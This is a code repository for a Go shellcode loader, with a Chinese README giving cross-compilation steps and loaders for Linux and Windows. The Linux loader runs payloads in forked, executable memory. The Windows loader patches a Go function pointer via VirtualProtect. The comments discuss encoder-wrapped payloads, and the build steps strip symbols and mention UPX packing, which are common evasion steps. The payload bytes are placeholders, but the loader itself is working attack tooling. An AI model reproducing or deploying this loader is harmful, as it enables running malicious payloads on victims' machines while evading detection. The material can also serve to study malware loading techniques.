├── README.md ├── linuxlaunch.go ├── linuxshellcode └── shellcode_unix.go ├── upx64 ├── upx64.exe ├── winlaunch.go └── winshellcode └── shellcode_windows.go /README.md: -------------------------------------------------------------------------------- 1 | # go 编写 shellcode 加载器 2 | 3 | 引用 4 | > https://github.com/brimstone/go-shellcode 5 | 6 | ## 使用 7 | git clone https://github.com/jax777/shellcode-launch 8 | 复制到 $GOPATH/src 路径下（代码通过 GOPATH 风格的导入路径 `shellcode-launch/...` 引用子包，未使用 Go modules） 9 | ### windows 下 10 | 生成shellcode 11 | 修改 `winlaunch.go` 文件sc 变量 12 | 在当前目录打开cmd 13 | - 32 位 运行 14 | ``` 15 | set CGO_ENABLED=0 16 | set GOOS=windows 17 | set GOARCH=386 18 | go build -ldflags="-s -w" winlaunch.go 19 | ``` 20 | - 64 位 运行（仓库中并没有 win_64.bat 文件，直接执行下面的命令即可） 21 | ``` 22 | set CGO_ENABLED=0 23 | set GOOS=windows 24 | set GOARCH=amd64 25 | go build -ldflags="-s -w" winlaunch.go 26 | ``` 27 | 28 | ### linux 下 29 | 生成shellcode 30 | 修改 `linuxlaunch.go` 文件sc 变量 31 | - 32 位 运行（CGO_ENABLED=1 交叉编译到 386 需要本机有 32 位 C 工具链） 32 | `CGO_ENABLED=1 GOOS=linux GOARCH=386 go build -ldflags="-s -w" linuxlaunch.go` 33 | - 64 位 运行 34 | `CGO_ENABLED=1 GOOS=linux GOARCH=amd64 go build -ldflags="-s -w" linuxlaunch.go` 35 | 36 | ## 注意 37 | 仓库中附带的 upx64 / upx64.exe 是未说明来源的二进制文件，建议从 UPX 官方发布页自行下载并校验哈希后再使用。 -------------------------------------------------------------------------------- /linuxlaunch.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "shellcode-launch/linuxshellcode" 5 | ) 6 | 7 | func main() { 8 | sc := []byte("xaa\x51") 9 | linuxshellcode.Run(sc) 10 | } 11 | -------------------------------------------------------------------------------- /linuxshellcode/shellcode_unix.go: -------------------------------------------------------------------------------- 1 | // +build linux freebsd darwin 2 | package linuxshellcode 3 | 4 | /* 5 | #include <sys/mman.h> 6 | #include <string.h> 7 | #include <stdio.h> 8 | #include <unistd.h> 9 | 10 | void call(char *shellcode, size_t length) { 11 | if(fork()) { 12 | return; 13 | } 14 | unsigned char *ptr; 15 | ptr = (unsigned char *) mmap(0, length, \ 16 | PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); 17 | 
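if (ptr == MAP_FAILED) {
    perror("mmap");
    /* We are inside the forked child here: a plain return would hand
       control back to the Go runtime and leave a second copy of the
       program running. Terminate the child instead. */
    _exit(1);
}
memcpy(ptr, shellcode, length);
/* NOTE(review): the mapping is left RWX because some payloads (encoder-
   wrapped shellcode) decode themselves in place. If the payload is known
   not to self-modify, mprotect(ptr, length, PROT_READ|PROT_EXEC) here
   would enforce W^X before the jump. */
((void (*)(void)) ptr)();
/* Reached only if the payload returns; never let the child fall back
   into the Go program. */
_exit(0);
}
*/
import "C"
import (
	"unsafe"
)

// Run executes sc as native code in a forked child process (see call()
// above). The parent returns immediately and is not told whether the
// child managed to map or run the payload; failures are only reported on
// the child's stderr.
//
// sc must be non-empty: the address of its first byte is handed to C.
func Run(sc []byte) {
	if len(sc) == 0 {
		panic("linuxshellcode: empty shellcode")
	}
	C.call((*C.char)(unsafe.Pointer(&sc[0])), C.size_t(len(sc)))
}
-------------------------------------------------------------------------------- /upx64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jax777/shellcode-launch/b9d29c0dd42ac03e82939887f50b7a667cd6cbbe/upx64 -------------------------------------------------------------------------------- /upx64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jax777/shellcode-launch/b9d29c0dd42ac03e82939887f50b7a667cd6cbbe/upx64.exe -------------------------------------------------------------------------------- /winlaunch.go: --------------------------------------------------------------------------------
package main

import (
	"shellcode-launch/winshellcode"
)

// main hands the embedded bytes to the Windows loader. The literal below
// is only a placeholder and must be replaced with a real payload.
func main() {
	sc := []byte("\xfc\x48\x83")
	winshellcode.Run(sc)
}
-------------------------------------------------------------------------------- /winshellcode/shellcode_windows.go: --------------------------------------------------------------------------------
package winshellcode

import (
	"syscall"
	"unsafe"
)

// pageExecuteReadWrite is PAGE_EXECUTE_READWRITE from <memoryapi.h>.
const pageExecuteReadWrite uint32 = 0x40

var procVirtualProtect = syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect")

// virtualProtect wraps kernel32!VirtualProtect and returns the Win32
// error when the call reports failure (a zero return value). The exported
// bool-returning VirtualProtect cannot carry that detail.
func virtualProtect(lpAddress unsafe.Pointer, dwSize uintptr, flNewProtect uint32, lpflOldProtect unsafe.Pointer) error {
	ret, _, err := procVirtualProtect.Call(
		uintptr(lpAddress),
		uintptr(dwSize),
		uintptr(flNewProtect),
		uintptr(lpflOldProtect))
	if ret == 0 {
		// Call always returns a non-nil Errno; it is only meaningful
		// when the API itself reported failure.
		return err
	}
	return nil
}

// VirtualProtect changes the protection of the pages covering
// [lpAddress, lpAddress+dwSize) to flNewProtect and stores the previous
// protection in *lpflOldProtect. It reports success only; see
// virtualProtect for the reason behind a failure.
func VirtualProtect(lpAddress unsafe.Pointer, dwSize uintptr, flNewProtect uint32, lpflOldProtect unsafe.Pointer) bool {
	return virtualProtect(lpAddress, dwSize, flNewProtect, lpflOldProtect) == nil
}

// Run executes sc in the current process by turning it into a callable
// Go func value.
//
// f is an empty closure; the func value behind it is a pointer to a
// funcval whose first word is the code pointer. Run makes that word
// writable, points it at the first byte of sc, makes sc's pages
// executable and then calls f, which jumps into the shellcode. The
// payload runs on the calling goroutine's stack, in this process.
//
// Run panics if sc is empty or if a VirtualProtect call fails; the panic
// message carries the Win32 error text.
func Run(sc []byte) {
	// TODO need a Go safe fork
	if len(sc) == 0 {
		panic("winshellcode: empty shellcode")
	}

	// Make a function ptr
	f := func() {}

	// The funcval behind f normally lives in read-only memory; make the
	// one word we patch writable.
	funcvalWord := unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&f)))
	var oldfperms uint32
	if err := virtualProtect(funcvalWord, unsafe.Sizeof(uintptr(0)), pageExecuteReadWrite, unsafe.Pointer(&oldfperms)); err != nil {
		panic("Call to VirtualProtect failed! " + err.Error())
	}

	// Override function ptr with the address of the shellcode bytes.
	**(**uintptr)(unsafe.Pointer(&f)) = uintptr(unsafe.Pointer(&sc[0]))

	// Put the patched word's page back to its previous protection: the
	// pointer only has to be readable from here on. Best-effort, since
	// the patch has already landed.
	var scratch uint32
	_ = virtualProtect(funcvalWord, unsafe.Sizeof(uintptr(0)), oldfperms, unsafe.Pointer(&scratch))

	// Make the shellcode bytes executable. RWX is kept (rather than
	// PAGE_EXECUTE_READ) because encoder-wrapped payloads decode
	// themselves in place.
	var oldshellcodeperms uint32
	if err := virtualProtect(unsafe.Pointer(&sc[0]), uintptr(len(sc)), pageExecuteReadWrite, unsafe.Pointer(&oldshellcodeperms)); err != nil {
		panic("Call to VirtualProtect failed! " + err.Error())
	}

	// NOTE(review): the payload executes on a goroutine stack, which Go
	// keeps small and grows by copying; confirm the intended payload's
	// stack usage fits before relying on this.
	f()
}
--------------------------------------------------------------------------------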